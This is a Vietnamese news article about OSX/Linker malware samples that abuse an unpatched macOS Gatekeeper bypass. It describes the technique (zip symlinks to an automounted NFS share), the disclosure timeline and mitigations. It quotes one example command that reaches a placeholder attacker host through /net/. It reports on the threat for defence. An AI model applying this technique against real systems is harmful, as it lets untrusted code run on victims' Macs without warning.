Phần mềm độc hại mới khai thác lỗ hổng của GateKeeper trên macOS

Phần mềm độc hại mới khai thác lỗ hổng của GateKeeper trên macOS

June 26, 2019 | vietsunshine

Các nhà nghiên cứu an ninh mạng từ Intego đang cảnh báo về khả năng khai thác một lỗ hổng bảo mật chưa được vá trong các chi tiết tính năng bảo mật macOS Gatekeeper của Apple và PoC đã được tiết lộ công khai vào cuối tháng trước.

Nhóm Intego tuần trước đã phát hiện ra bốn mẫu phần mềm độc hại macOS mới trên VirusTotal, tận dụng lỗ hổng bypass GateKeeper để thực thi mã không tin cậy trên macOS mà không hiển thị cho người dùng bất kỳ cảnh báo nào hoặc xin phép họ.

Tuy nhiên, phần mềm độc hại mới được phát hiện, được đặt tên là OSX/Linker, cho đến nay vẫn chưa được nhìn thấy và dường như đang được phát triển. Mặc dù các mẫu tận dụng lỗ hổng Gatekeeper chưa được vá, nhưng nó không tải xuống bất kỳ ứng dụng độc hại nào từ máy chủ của kẻ tấn công.

Theo Joshua Long từ Intego, cho đến tuần trước, “nhà sản xuất phần mềm độc hại chỉ đơn thuần là tiến hành một số trinh sát thử nghiệm phát hiện”.

Tuy nhiên, do mẫu phần mềm độc hại liên kết với máy chủ từ xa nơi tải xuống ứng dụng không tin cậy, kẻ tấn công cũng có thể phân phối các mẫu tương tự đến mục tiêu thực bằng cách chỉ thay thế ứng dụng mẫu được xác định bằng ứng dụng phần mềm độc hại trên máy chủ của chúng.

Lỗ hổng bypass Gatekeeper trên macOS

GateKeeper là một tính năng bảo mật được tích hợp trong macOS của Apple, thực thi việc ký mã và xác minh các ứng dụng đã tải xuống trước khi cho phép chúng chạy, giúp người dùng bảo vệ hệ thống của họ khỏi malware và phần mềm độc hại khác.

Điều đó có nghĩa là, nếu bạn tải xuống một ứng dụng từ Internet, GateKeeper sẽ chỉ cho phép nó thực thi mà không có bất kỳ cảnh báo nào nếu nó đã được ký với chứng chỉ do Apple cấp hợp lệ, nếu không sẽ nhắc bạn cho phép hoặc từ chối thực thi.

Tuy nhiên, Gatekeeper đã được thiết kế để sau khi kiểm tra cả ổ đĩa ngoài (USB hoặc ổ cứng) và chia sẻ mạng là “vị trí an toàn” từ đó người dùng có thể chạy bất kỳ ứng dụng nào mà không cần liên quan đến kiểm tra và nhắc nhở của GateKeeper.

Filippo Cavallarin, một nhà nghiên cứu bảo mật độc lập, cuối tháng trước đã công khai tiết lộ cách khai thác hành vi này bằng cách kết hợp nó với hai tính năng hợp pháp khác của hệ điều hành macOS, đó là: kho lưu trữ zip có thể chứa các liên kết tượng trưng chỉ đến một vị trí tùy ý, bao gồm các điểm cuối tự động và tính năng automount trên macOS có thể tự động gắn kết chia sẻ mạng từ máy chủ từ xa chỉ bằng cách truy cập vào nó bằng một đường dẫn “đặc biệt”, bắt đầu bằng “/net/.”

“Ví dụ: ls /net/evil-attacker.com/Sharedfolder/ sẽ khiến hệ điều hành đọc nội dung của ‘sharedfolder’ trên máy chủ từ xa (evil-attacker.com) bằng NFS,” Cavallarin giải thích trong một bài đăng trên blog.

Như thể hiện trong video trình diễn, Cavallarin đã tạo một tệp ZIP có liên kết tượng trưng đến chia sẻ mạng do kẻ tấn công kiểm soát mà macOS sẽ tự động hóa. Khi một nạn nhân mở kho lưu trữ ZIP và theo liên kết, anh ta sẽ điều hướng đến chia sẻ mạng do kẻ tấn công kiểm soát mà Gatekeeper tin tưởng, lừa nạn nhân chạy các tệp thực thi độc hại mà không có bất kỳ cảnh báo nào.

“Cách Finder được thiết kế (ví dụ: ẩn các phần mở rộng .app, ẩn đường dẫn đầy đủ khỏi thanh tiêu đề) làm cho kỹ thuật này rất hiệu quả và khó phát hiện”, nhà nghiên cứu nói.

Tuy nhiên, các mẫu phần mềm độc hại mới được phát hiện không phải là tệp ZIP, mà là tệp disk image (với .dmg), cho thấy “các nhà sản xuất phần mềm độc hại đang thử nghiệm xem liệu lỗ hổng của Cavallarin có hoạt động với disk image không.”

Cavallarin đã báo cáo phát hiện của mình cho Apple vào ngày 22 tháng 2 nhưng đã quyết định công khai vào cuối tháng trước sau khi công ty không khắc phục được vấn đề trong thời hạn 90 ngày tiết lộ và bắt đầu bỏ qua email của mình.

Cho đến khi Apple khắc phục vấn đề này, nhà nghiên cứu khuyên các quản trị viên mạng nên chặn giao tiếp NFS bằng địa chỉ IP bên ngoài và đối với người dùng gia đình, điều quan trọng là không mở tệp đính kèm email từ một nguồn không xác định, đáng ngờ hoặc không đáng tin cậy.

Nguồn: New Mac Malware Exploits GateKeeper Bypass Bug that Apple Left Unpatched

Xem thêm: Lỗ hổng 0-Day của macOS cho phép hacker bypass các tính năng bảo mật

Tags: , ,